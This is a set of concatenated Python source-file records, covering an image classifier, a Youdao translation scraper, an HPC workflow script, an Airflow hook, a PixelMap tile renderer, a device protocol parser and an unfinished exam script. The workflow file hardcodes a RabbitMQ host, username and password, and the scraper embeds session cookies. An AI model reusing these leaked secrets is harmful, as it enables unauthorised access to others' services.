models.resnet34(pretrained=True)\n\nif cuda.is_available():\n model_ft = models.resnet34(pretrained=True).cuda()\n\n\nmodel_ft.fc = nn.Linear(model_ft.fc.in_features,2)\nif cuda.is_available():\n model_ft.fc = nn.Linear(model_ft.fc.in_features,2).cuda()\n\n\ncriterion = nn.CrossEntropyLoss()\nif cuda.is_available():\n criterion = nn.CrossEntropyLoss().cuda()\n\n# optimzier_ft = optim.Adam(params=model_ft.parameters(),lr=args.lr)\noptimzier_ft = optim.SGD(params=model_ft.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n nesterov=True)\n\nexp_lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimzier_ft,mode='min')\n\ndef train_model_tf(\n model=model_ft,\n optimizer=optimzier_ft,\n scheduler=exp_lr_scheduler,\n epochs=args.epochs):\n\n timestamp_st = time.time()\n best_model_weights = copy.deepcopy(model.state_dict())\n best_accuracy = 0\n for epoch in range(epochs):\n print(f'epoch {epoch+1}/{epochs}')\n print('-'*50)\n\n for phase in data_trans.keys():\n\n data_size = data_sizes[phase]\n if phase == 'train_set' :\n # scheduler.step()\n model.train(True)\n else:\n model.train(False)\n\n running_loss = 0.0\n running_corrects = 0.0\n\n for data in data_loaders[phase]:\n\n inps,labs = data\n inps,labs = autograd.Variable(inps),autograd.Variable(labs)\n\n if cuda.is_available():\n inps,labs = autograd.Variable(inps).cuda(),autograd.Variable(labs).cuda()\n\n\n optimizer.zero_grad()\n\n outs = model(inps)\n _,preds = torch.max(outs.data,1)\n loss = criterion(outs,labs)\n\n if phase == 'train_set' :\n loss.backward()\n optimizer.step()\n\n running_loss += loss.data[0] * inps.size(0)\n running_corrects += torch.sum(preds == labs.data)\n\n if phase == 'valid_set':\n scheduler.step(running_loss)\n\n 
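# totals accumulated over the whole test set; averaged into test_loss/test_acc below\n 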
print(f'{phase} running Loss : {running_loss:.4f} running_corrects {running_corrects:.4f}')\n            epoch_loss = running_loss / data_size\n            epoch_accuracy = float(running_corrects) / data_size\n\n            print(f'{phase} Loss : {epoch_loss:.4f} Acc {epoch_accuracy:.4f}')\n\n            if phase =='valid_set' and epoch_accuracy > best_accuracy :\n\n                best_accuracy = epoch_accuracy\n                best_model_weights = copy.deepcopy(model.state_dict())\n\n        print()\n    time_elapsed = time.time() - timestamp_st\n    print(f'Training complete in {time_elapsed//60:.0f}m {time_elapsed % 60 :.0f}s \\n'\n          f'Best value Accuracy in valid set : {best_accuracy:.4f}')\n\n    model.load_state_dict(best_model_weights)\n    return model\n\nif args.load :\n    model_ft = train_model_tf()\n    torch.save(model_ft.state_dict(),\"CDD_model.pth\")\nelse:\n    model = models.resnet34(False).cuda()\n    checkpoint = torch.load(\"CDD_model.pth\")\n    model.fc = nn.Linear(model.fc.in_features, 2).cuda()\n    model.load_state_dict(checkpoint)\n    model.train(False)\n    model.eval()\n    print('-' * 50)\n\n    running_loss = 0.0\n    running_corrects = 0.0\n\n    for data in test_loader[phase]:\n        inps, labs = data\n        inps, labs = torch.autograd.Variable(inps), torch.autograd.Variable(labs)\n\n        if cuda.is_available():\n            inps, labs = torch.autograd.Variable(inps).cuda(), torch.autograd.Variable(labs).cuda()\n\n        outs = model(inps)\n        _, preds = torch.max(outs.data, 1)\n        loss = criterion(outs, labs)\n\n        running_loss += loss.data[0] * inps.size(0)\n        running_corrects += torch.sum(preds == labs.data)\n\n    print(f'{phase} running Loss : {running_loss:.4f} running_corrects {running_corrects:.4f}')\n    print()\n    test_loss = running_loss / test_data_size\n    test_acc = float(running_corrects) / test_data_size\n    print(f'{phase} Loss : {test_loss:.4f} Acc {test_acc:.4f}')\n\n    model = train_model_tf(model=model)\n    torch.save(model.state_dict(),\"CDD_model_x2.pth\")\n\n\n\n\n\n","sub_path":"Car-Damage-Detector.py","file_name":"Car-Damage-Detector.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289255445","text":"# -*- coding:utf-8 -*-\nimport json\nimport time\nimport random\nimport hashlib\nimport urllib\nimport urllib2\n\ndef send_request():\n    # inputs for the site's reverse-engineered JS signing algorithm\n    r = str(int(time.time() * 1000) + random.randint(0, 10))\n    D = \"ebSeFb%=XZ%T[KZ)c(sy!\"\n    S = \"fanyideskweb\"\n    n = raw_input(\"请输入需要翻译的文字:\")\n    sign = hashlib.md5(r + D + S + n).hexdigest()  # the form needs the hex digest string, not the md5 object\n\n    form_data = {\n        \"i\": n,\n        \"from\": \"AUTO\",\n        \"to\": \"AUTO\",\n        \"smartresult\": \"dict\",\n        \"client\": \"fanyideskweb\",\n        \"salt\": r,\n        \"sign\": sign,\n        \"doctype\": \"json\",\n        \"version\": \"2.1\",\n        \"keyfrom\": \"fanyi.web\",\n        \"action\": \"FY_BY_CLICKBUTTION\",\n        \"typoResult\": \"false\"\n    }\n    data = urllib.urlencode(form_data)\n    base_url = \"http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule\"\n    headers = {\n        \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n        # \"Accept-Encoding\" : \"gzip, deflate\",\n        \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\n        \"Connection\": \"keep-alive\",\n        # \"Content-Length\": \"218\",\n        \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n        \"Cookie\": \"_ntes_nnid=f77d53cb936304b5333b304b767a4958,1506087321856; OUTFOX_SEARCH_USER_ID_NCOO=971893961.4325761; OUTFOX_SEARCH_USER_ID=-1480774266@10.169.0.83; JSESSIONID=aaaouUJJcJbTucFMz-8kw; ___rl__test__cookies=1523590284588\",\n        \"Host\": \"fanyi.youdao.com\",\n        \"Origin\": \"http://fanyi.youdao.com\",\n        \"Referer\": 
\"http://fanyi.youdao.com/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n }\n\n request = urllib2.Request(base_url, data, headers)\n\n request.add_header('Content-Length', len(data))\n response = urllib2.urlopen(request).read()\n\n return response\n\n\nif __name__ == '__main__':\n html = send_request()\n dict_obj = json.loads(html)\n # 翻译的内容\n print(dict_obj[\"translateResult\"][0][0][\"tgt\"])\n\n","sub_path":"day01_03/day02/5_post_youdao_translate.py","file_name":"5_post_youdao_translate.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"515742905","text":"from radical import entk\nimport os\nimport argparse, sys, math\n\nimport numpy as np\nfrom mocu.utils.utils import *\nfrom mocu.utils.costfunctions import *\nfrom mocu.src.experimentaldesign import *\nfrom mocu.src.mocu_utils import *\nfrom mocu.scripts.example_linearsys import *\n\nclass MOCU(object):\n\n def __init__(self):\n self.set_argparse()\n self._set_rmq()\n self.am = entk.AppManager(hostname=self.rmq_hostname, port=self.rmq_port, username=self.rmq_username, password=self.rmq_password)\n self.p = entk.Pipeline()\n self.s1 = entk.Stage()\n self.s2 = entk.Stage()\n\n def _set_rmq(self):\n self.rmq_port = int(os.environ.get('RMQ_PORT', 5672))\n self.rmq_hostname = os.environ.get('RMQ_HOSTNAME', '129.114.17.185')\n self.rmq_username = os.environ.get('RMQ_USERNAME', 'litan')\n self.rmq_password = os.environ.get('RMQ_PASSWORD', 'sccDg7PxE3UjhA5L')\n\n def set_resource(self, res_desc):\n res_desc[\"schema\"] = \"local\"\n self.am.resource_desc = res_desc\n\n def set_argparse(self):\n parser = argparse.ArgumentParser(description=\"MOCU_EnTK\")\n parser.add_argument(\"--num_run\", \"-n\", help=\"number of OED runs\")\n parser.add_argument(\"--theta\", \"-t\", help=\"value of theta\")\n parser.add_argument(\"--psi\", \"-p\", help=\"value of Psi\")\n parser.add_argument(\"--s\", \"-s\", help=\"value of s\")\n args = parser.parse_args()\n self.args = args\n if args.num_run is None or args.theta is None or args.psi is None or args.s is None:\n parser.print_help()\n sys.exit(-1)\n\n def example_linearsys_py(self, num_run, theta, psi, s):\n\n #os.system(\"mkdir ../MOCU_data\")\n\n for i in range(int(num_run)):#range(1, int(num_exp) + 1):\n t = entk.Task()\n t.pre_exec = [\n \"export INPUT=/gpfs/alpine/csc299/scratch/litan/MOCU/new/mocu/scripts\",\n #\"cd ../MOCU_data; rm -f Ji_*\",\n \"export OMP_NUM_THREADS=1\"\n ]\n t.executable = '/ccs/home/litan/miniconda3/envs/mocu/bin/python3.6'\n t.arguments = ['$INPUT/example_linearsys_stage1.py', '-n{}'.format(num_run), '-i{}'.format(i), '-t{}'.format(theta), '-p{}'.format(psi), '-s{}'.format(s)]\n #t.post_exec = [\"mv Ji_{} ../MOCU_data\".format(i+1)]\n t.post_exec = [\"mv Ji_{}.npy ..\".format(i+1)]\n t.cpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 4,\n 'thread_type': 'OpenMP'\n }\n '''t.gpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 1,\n 'thread_type': 'CUDA'\n }'''\n self.s1.add_tasks(t)\n self.p.add_stages(self.s1)\n\n t = entk.Task()\n t.pre_exec = [\n \"export INPUT=/gpfs/alpine/csc299/scratch/litan/MOCU/new/mocu/scripts\",\n \"cd ..\",\n \"export OMP_NUM_THREADS=1\"\n ]\n t.executable = '/ccs/home/litan/miniconda3/envs/mocu/bin/python3.6'\n t.arguments = ['$INPUT/example_linearsys_stage2.py', 
'-n{}'.format(num_run), '-t{}'.format(theta), '-p{}'.format(psi), '-s{}'.format(s)]\n        t.post_exec = [\"rm -f Ji_*.npy\"]\n        t.cpu_reqs = {\n            'processes': 1,\n            'process_type': None,\n            'threads_per_process': 4,\n            'thread_type': 'OpenMP'\n        }\n        '''t.gpu_reqs = {\n            'processes': 1,\n            'process_type': None,\n            'threads_per_process': 1,\n            'thread_type': 'CUDA'\n        }'''\n        self.s2.add_tasks(t)\n        self.p.add_stages(self.s2)\n\n    def run(self):\n        self.am.workflow = [self.p]\n        self.am.run()\n\n\nif __name__ == \"__main__\":\n\n    mocu = MOCU()\n    n_nodes = math.ceil(float(int(mocu.args.num_run)/41))\n    mocu.set_resource(res_desc = {\n        'resource': 'ornl.summit',\n        'queue'   : 'batch',\n        'walltime': 120, #MIN\n        'cpus'    : 168 * n_nodes,\n        'gpus'    : 6 * n_nodes,\n        'project' : 'MED110'\n        })\n    mocu.example_linearsys_py(num_run=mocu.args.num_run, theta=mocu.args.theta, psi=mocu.args.psi, s=mocu.args.s)\n    mocu.run()\n","sub_path":"mocu/graphical_model/mocu_entk.py","file_name":"mocu_entk.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"228799612","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/contrib/hooks/aws_dynamodb_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 2370 bytes\nfrom airflow.exceptions import AirflowException\nfrom airflow.contrib.hooks.aws_hook import AwsHook\n\nclass AwsDynamoDBHook(AwsHook):\n    __doc__ = '\\n    Interact with AWS DynamoDB.\\n\\n    :param table_keys: partition key and sort key\\n    :type table_keys: list\\n    :param table_name: target DynamoDB table\\n    :type table_name: str\\n    :param region_name: aws region name (example: us-east-1)\\n    :type region_name: str\\n    '\n\n    def __init__(self, table_keys=None, table_name=None, region_name=None, *args, **kwargs):\n        self.table_keys = table_keys\n        self.table_name = table_name\n        self.region_name = region_name\n        (super(AwsDynamoDBHook, self).__init__)(*args, **kwargs)\n\n    def get_conn(self):\n        self.conn = self.get_resource_type('dynamodb', self.region_name)\n        return self.conn\n\n    def write_batch_data(self, items):\n        \"\"\"\n        Write batch items to dynamodb table with provisioned throughout capacity.\n        \"\"\"\n        dynamodb_conn = self.get_conn()\n        try:\n            table = dynamodb_conn.Table(self.table_name)\n            with table.batch_writer(overwrite_by_pkeys=(self.table_keys)) as (batch):\n                for item in items:\n                    batch.put_item(Item=item)\n\n            return True\n        except Exception as general_error:\n            raise AirflowException('Failed to insert items in dynamodb, error: {error}'.format(error=(str(general_error))))","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/aws_dynamodb_hook.cpython-36.py","file_name":"aws_dynamodb_hook.cpython-36.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"550331360","text":"import logging\nimport sys\n\ngettrace = getattr(sys, 'gettrace', None)\n\n\ndef hexdump(d):\n    for i in range(0, len(d), 16):\n        data = d[i:i + 16]\n        # hex() rejects bytes; format each byte by hand instead\n        print(\"%08X | %s | %s\" % (i, ' '.join('%02X' % b for b in data).ljust(47), ascii(data)))\n\n\ndef read_file(filename):\n    f = open(filename, \"rb\")\n    data = f.read()\n    f.close()\n    return data\n\n\n# sys.gettrace can be absent, leaving gettrace as None; guard before calling\nif gettrace and gettrace():\n    logging.basicConfig(format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n                        level=logging.DEBUG)\nelse:\n    logging.basicConfig(format='%(asctime)s 
- %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n                        level=logging.INFO)\nPROGRAM_NAME = \"py_ios_device\"\n","sub_path":"ios_device/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"211096173","text":"from typing import Tuple\r\n\r\nfrom utils.utils import get_global_settings, get_time\r\nfrom models.economy_user import EconomyUser\r\nfrom models.logs import *\r\nfrom models.enums import TransactionStatus\r\n\r\n\r\ndef new_transaction(sender: EconomyUser, receptor: EconomyUser, quantity: float, database_name: str, channel_name: str, type: str = 'transferencia') -> Tuple[TransactionStatus, str]:\r\n    \"\"\"Performs a transaction between two users\r\n\r\n    Args:\r\n        sender (EconomyUser): user sending the transaction\r\n        receptor (EconomyUser): user receiving the transaction\r\n        quantity (float): amount of the transaction\r\n        database_name (str): name of the mongo database\r\n        channel_name (str): name of the channel\r\n\r\n    Returns:\r\n        Tuple[TransactionStatus, str]: [transaction status, transaction id]\r\n    \"\"\"\r\n\r\n    global_settings = get_global_settings()\r\n    quantity = round(quantity, global_settings.max_decimals)\r\n\r\n    if quantity <= 0.0:\r\n        return TransactionStatus.negative_quantity, ''\r\n    if sender._id == receptor._id:\r\n        return TransactionStatus.sender_is_receptor, ''\r\n\r\n    receptor_exists = receptor.get_data_from_db()\r\n    sender_exists = sender.get_data_from_db()\r\n\r\n    if not sender_exists:\r\n        return TransactionStatus.sender_not_exists, ''\r\n    if not receptor_exists:\r\n        return TransactionStatus.receptor_not_exists_not_exists, ''\r\n\r\n    if sender.balance.value < quantity:\r\n        return TransactionStatus.insufficient_coins, ''\r\n\r\n    # Perform the transaction\r\n    sender.balance -= quantity\r\n    receptor.balance += quantity\r\n\r\n    # # Log the transaction\r\n    transaction_log = TransactionLog(\r\n        get_time(), type, sender, receptor, quantity, channel_name)\r\n    transaccion_id = transaction_log.send_log_to_db(database_name)\r\n\r\n    return TransactionStatus.succesful, transaccion_id\r\n","sub_path":"core/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"461764616","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef conv(in_channels, out_channels, kernel_size, stride=2, padding=1, batch_norm=False, instance_norm=False):\n    layers = []\n    conv_layer = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n                           padding=padding, bias=False)\n    layers.append(conv_layer)\n    if batch_norm:\n        layers.append(nn.BatchNorm2d(out_channels))\n    if instance_norm:\n        layers.append(nn.InstanceNorm2d(out_channels))\n    return nn.Sequential(*layers)\n\n\ndef deconv(in_channels, out_channels, kernel_size, stride=2, padding=1, batch_norm=False, instance_norm=False,\n           dropout=False, dropout_ratio=0.5):\n    layers = []\n    layers.append(nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, padding, bias=False))\n    if batch_norm:\n        layers.append(nn.BatchNorm2d(out_channels))\n    if instance_norm:\n        layers.append(nn.InstanceNorm2d(out_channels))\n    if dropout:\n        layers.append(nn.Dropout2d(dropout_ratio))\n\n    return nn.Sequential(*layers)\n\n\nclass ResidualBlock(nn.Module):\n\n    def __init__(self, conv_dim):\n        super(ResidualBlock, self).__init__()\n\n        
self.conv1 = conv(in_channels=conv_dim, out_channels=conv_dim, kernel_size=3, stride=1, padding=1,\n                          instance_norm=True)\n        self.conv2 = conv(in_channels=conv_dim, out_channels=conv_dim, kernel_size=3, stride=1, padding=1,\n                          instance_norm=True)\n\n    def forward(self, x):\n        out_1 = F.relu(self.conv1(x))\n        out_2 = x + self.conv2(out_1)\n        return out_2\n","sub_path":"auxiliary_func.py","file_name":"auxiliary_func.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"256238033","text":"from __future__ import division\nfrom PIL import Image, ImageDraw, ImageFont\nimport pandas as pd \nfrom datetime import date, timedelta\n\nyesterday = date.today() - timedelta(days = 2)\nbeforeyesterday = date.today() - timedelta(days = 3)\nbbyesterday = date.today() - timedelta(days = 4)\n\n\nurl = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'\ndf = pd.read_csv(url, error_bad_lines=False)\nindex = df.index\nlength = len(index)\n\nfor x in range(2,length):\n\tif str(df.loc[x][0]) == str(yesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\tcases = df.loc[x][3]\n\t\t\tdeaths = df.loc[x][4]\n\telif str(df.loc[x][0]) == str(beforeyesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\toldcases = df.loc[x][3]\n\t\t\tolddeaths = df.loc[x][4]\n\telif str(df.loc[x][0]) == str(bbyesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\tbeforeoldcases = df.loc[x][3]\n\t\t\tbeforeolddeaths = df.loc[x][4]\n\n\nurl2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us.csv'\ndfUS = pd.read_csv(url2, error_bad_lines=False)\nindexUS = dfUS.index\nlengthUS = len(indexUS)\n\nfor y in range(2,lengthUS):\n\tif str(dfUS.loc[y][0]) == str(yesterday):\n\t\tUScases = dfUS.loc[y][1]\n\n\nnewcases = cases - oldcases\nnewdeaths = deaths - olddeaths\npercent = cases/oldcases\n# a ratio below 1 means cases fell (the original labels were swapped);\n# convert the fraction to a percentage for display\nif percent < 1:\n\tincdec = \"decrease\"\n\tpercent = round((1-percent)*100,2)\nelse:\n\tpercent = round((percent-1)*100,2)\n\tincdec = \"increase\"\n\n\nimg = Image.new('RGB', (1080,1350), color = \"white\")\ndraw = ImageDraw.Draw(img)\n\nfnt = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 120)\nfnt2 = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 60)\nfnt3 = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 30)\ntext = \"Yesterday there were \" + str(newcases) + \"\\n\\nnew cases of COVID-19 \\n\\nreported in New Jersey, \\n\\nthat is a \" + str(percent) + \"% \" + incdec + \" in \\n\\ncases. 
This brings us to a total \\n\\nof \" + str(cases) + \" COVID-19 cases in \\n\\nNew Jersey and \" + str(UScases) + \" cases \\n\\nnationwide\"\n\ndraw.text((10,10), \"Today's COVID-19 \\nUpdate:\", font=fnt, fill=(226,62,89))\ndraw.text((40,350), text, font=fnt2, fill=(98,98,98))\ndraw.text((500,1300), \"Source: NY Times COVID-19 Data\", font=fnt3, fill=(0,0,0))\n\nimg.save('post.png')\n\n\n\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"640205874","text":"#!/usr/bin/env python\nimport json\nimport time\n\nfrom PIL import Image\n\nfrom functions import (\n chunk_str,\n connect_redis,\n double_mult,\n get_contract,\n get_default_tile,\n get_default_url,\n get_for_sale_tile,\n get_position,\n hex_to_rgb,\n)\n\n\ndef render_tile(location):\n # Connect to Redis and Blockchain\n redis_server = connect_redis()\n contract = get_contract()\n\n # Get Tile Data\n try:\n tile = contract.functions.tiles(location).call()\n except Exception as e:\n print(e)\n print(\n \"Can't connect to Parity, or !synced to block #2641527. Waiting 5 seconds...\"\n )\n tile = False\n while not tile:\n try:\n tile = contract.functions.tiles(location).call()\n except Exception as e:\n time.sleep(5)\n print(\n \"Can't connect to Parity, or !synced to block #2641527. \\\n Waiting 5 seconds...\"\n )\n print(e)\n tile = False\n\n owner = tile[0]\n url = tile[2]\n image = tile[1]\n price = tile[3]\n tile_name = str(location)\n print(\"Rendering \" + tile_name + \"...\")\n # Defaults if data not set.\n if not url:\n url = get_default_url()\n if not image:\n image = get_default_tile(owner)\n image = image.strip()\n if not len(image) == 768:\n image = get_default_tile(owner)\n if price != 0:\n image = get_for_sale_tile()\n \n # Update Redis Data\n redis_server.hmset(tile_name, {\"owner\": owner, \"url\": url})\n # Render Image from Image Data. Every 3 char. 
represents 1 pixel.\n rgb_image_data = []\n for pixel in chunk_str(image, 3):\n rgb_image_data.append(hex_to_rgb(double_mult(pixel)))\n\n # Start with Black Image\n rendered_image = Image.new(\"RGB\", (16, 16), \"black\")\n pixels = rendered_image.load()\n\n # For every pixel in image:\n for i in range(rendered_image.size[0]):\n for j in range(rendered_image.size[1]):\n pixel = rgb_image_data[get_position(i, j)]\n pixels[i, j] = (pixel[0], pixel[1], pixel[2])\n\n # Save Tile\n rendered_image.save(\"tiles/\" + tile_name + \".png\")\n\n # Make big tile for OpenSea\n big_tile = rendered_image.resize((350, 350), Image.NEAREST)\n big_tile.save(\"large_tiles/\" + tile_name + \".png\")\n\n data = {\n \"description\": \"Official PixelMap (2016) Wrapper\",\n \"external_url\": url,\n \"image\": f\"https://s3.us-east-1.amazonaws.com/pixelmap.io/{tile_name}.png\",\n \"name\": f\"Tile #{tile_name}\",\n }\n\n with open(f\"large_tiles/{tile_name}.json\", \"w\") as outfile:\n json.dump(data, outfile, indent=4)\n","sub_path":"render_tile.py","file_name":"render_tile.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"238290434","text":"from os import environ\nfrom translation_manager import TranslationManager\nfrom abstract_translator import \\\n MessageTranslator, MessageTranslatorUserDefinedFunctions, MessageTranslatorPathManipulation\nfrom json import load\n\nif __name__ == \"__main__\":\n SOURCE_FORMAT = environ.get('SOURCE_FORMAT', 'json')\n TARGET_FORMAT = environ.get('TARGET_FORMAT', 'xml')\n OPERATION = environ.get('OPERATION', 'format_translation')\n SCRIPT_FILE = environ.get('SCRIPT_FILE', '')\n FUNCTION_NAME = environ.get('FUNCTION_NAME', '')\n PATHS_FILE = environ.get('PATHS_FILE', '')\n\n SOURCE_TOPIC = environ.get('SOURCE_TOPIC', 'test')\n TARGET_TOPIC = environ.get('TARGET_TOPIC', 'neu')\n KAFKA_BROKER = environ.get('KAFKA_BROKER', 'localhost:9092')\n\n print(f'Starting translation from \"{SOURCE_FORMAT}\" to \"{TARGET_FORMAT}\".')\n print(f'Subscribing to kafka broker \"{KAFKA_BROKER}\" topic \"{SOURCE_TOPIC}\".')\n print(f'Publishing translated messages on topic \"{TARGET_TOPIC}\"')\n\n translator = MessageTranslator.get_translator(SOURCE_FORMAT, TARGET_FORMAT, OPERATION)\n if isinstance(translator, MessageTranslatorUserDefinedFunctions) and SCRIPT_FILE != '':\n with open(SCRIPT_FILE, 'r') as file:\n script = file.read()\n translator.set_script(script, FUNCTION_NAME)\n if isinstance(translator, MessageTranslatorPathManipulation) and PATHS_FILE != '':\n with open(PATHS_FILE, 'r') as file:\n paths = load(file)\n translator.set_element_paths(paths)\n\n manager = TranslationManager([KAFKA_BROKER], SOURCE_TOPIC, TARGET_TOPIC, translator)\n try:\n manager.start_consuming()\n except KeyboardInterrupt:\n print('exiting program')\n","sub_path":"translator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"642013975","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport _thread\nimport time\nfrom neurons_engine import response_distributor\nfrom neurons_engine import neurons_heartbeat_func\nfrom neurons_engine import neuron_request_bind_phy\n\n# Note!!!!!!!!!!\n # find thread stack config in app/config.py \n\nNEURONS_PROTOCOL_HEAD = const(0xf0)\nNEURONS_PROTOCOL_END = const(0xf7)\n\n_FSM_STA_NONE = const(0)\n_FSM_STA_HEAD = const(1)\n_FSM_STA_DATA = 
const(2)\n_FSM_STA_CHECKSUM = const(3)\n_FSM_STA_END = const(4)\n\n\ndef create_f0f7_frame(data):\n    frame = [NEURONS_PROTOCOL_HEAD]  # the frame opens with the 0xf0 head byte; 0xf7 is the end marker\n    check_sum = 0\n    for item in data:\n        check_sum += item\n    check_sum &= 0x7F\n\n    frame.extend(data)\n    frame.append(check_sum)\n    frame.append(NEURONS_PROTOCOL_END)\n    return frame  # the original returned None, so nothing useful reached the uart\n\nclass _F0F7_frame:\n    def __init__(self):\n        self._frame_buf = [0] * 256\n        self._data_in_index = 0\n        self._check_sum = 0\n        self._fsm_status = _FSM_STA_NONE\n        \n        self._frame_process = None\n\n    def _frame_parse(self, data):\n        for i in range(len(data)):\n            if data[i] == NEURONS_PROTOCOL_HEAD:\n                self._fsm_status = _FSM_STA_DATA\n                self._data_in_index = 0\n            elif data[i] == NEURONS_PROTOCOL_END:\n                self._check_sum = 0\n                for j in range(self._data_in_index):\n                    self._check_sum += self._frame_buf[j]\n                self._check_sum &= 0x7F\n\n                if self._check_sum == self._frame_buf[self._data_in_index - 1]:\n                    if self._frame_process:\n                        self._frame_process(self._frame_buf[0:self._data_in_index])\n\n            elif self._fsm_status == _FSM_STA_DATA:\n                self._frame_buf[self._data_in_index] = data[i]\n                self._data_in_index += 1\n\n    def _register_frame_process(self, func):\n        self._frame_process = func\n\nclass neurons_protocol:\n    def __init__(self):\n        # binding the phy callback here referenced the name-mangled __neurons_engine_send_frame\n        # and raised NameError; the binding is done once at module level below instead\n        self._frame_c = _F0F7_frame()\n        self._frame_c._register_frame_process(self.parse_frame)\n\n    def parse_frame(self, frame, channel_info = bytes([0x01,0x00,0x00,0x00])):\n        response_distributor(frame, channel_info, 0x00)\n\n\n#####################################################\ndef __neurons_engine_send_frame(frame, copo = -1):\n    uart_B.write(bytes(create_f0f7_frame(frame)))  # UART.write expects a buffer, not a list\n\nneuron_request_bind_phy(__neurons_engine_send_frame)\n\nneurons = neurons_protocol()\n\nfrom fpioa_manager import fm, board_info\nfrom machine import UART\nimport utime\n\ndef uart_rec_task():\n    pre_time = utime.ticks_ms()\n\n    while True:\n        read_data = uart_B.read()\n        if None != read_data:\n            neurons._frame_c._frame_parse(read_data)\n            continue\n\n        if utime.ticks_ms() - pre_time > 500:\n            neurons_heartbeat_func()  # imported directly; the module name neurons_engine was never bound\n            pre_time = utime.ticks_ms()\n\n        utime.sleep(0.01)\n\ndef uart_rec_start():\n    global uart_A, uart_B  # the ports are read by uart_rec_task and the send callback\n    fm.register(board_info.PIN9,fm.fpioa.UART2_TX)\n    fm.register(board_info.PIN10,fm.fpioa.UART2_RX)\n    uart_A = UART(UART.UART1, 921600, 8, None, 1, timeout=1000, read_buf_len=4096)\n    uart_B = UART(UART.UART2, 921600, 8, None, 1, timeout=1000, read_buf_len=4096)\n\n    _thread.start_new_thread(uart_rec_task, ())\n","sub_path":"src/neurons_engine/neurons_protocol/neurons_protocol_parse.py","file_name":"neurons_protocol_parse.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"584637554","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 17 13:09:32 2015\n\n@author: Jack\n\"\"\"\n# Answer script to the 2012/13 Python exam - 17.12.2015\nimport scipy.interpolate\nimport numpy\n\n\ndef mult3vec(c, v):\n    \"\"\"Returns the vector v scaled by the scalar c\"\"\"\n    # reassigning the loop variable never modified v; build the scaled list instead\n    return [c * i for i in v]\n\n\ndef multvec(c, v):\n    \"\"\"Returns the vector v scaled by the scalar c\"\"\"\n    return [c * i for i in v]\n\n\ndef convert_time(t):\n    \"\"\"Returns the number of days, hours and minutes in a value of minutes t\"\"\"\n    secs = 60 * t\n    minutes = int(secs / 60) % 60\n    hours = int(secs / 3600) % 24  # wrap at 24 since whole days are reported separately\n    days = int(secs / (3600*24))\n    return days, hours, minutes\n\n\ndef nearest(xs, a):\n    \"\"\"Returns the element of xs that is nearest to a\"\"\"\n    value_list = []\n    for i in xs:
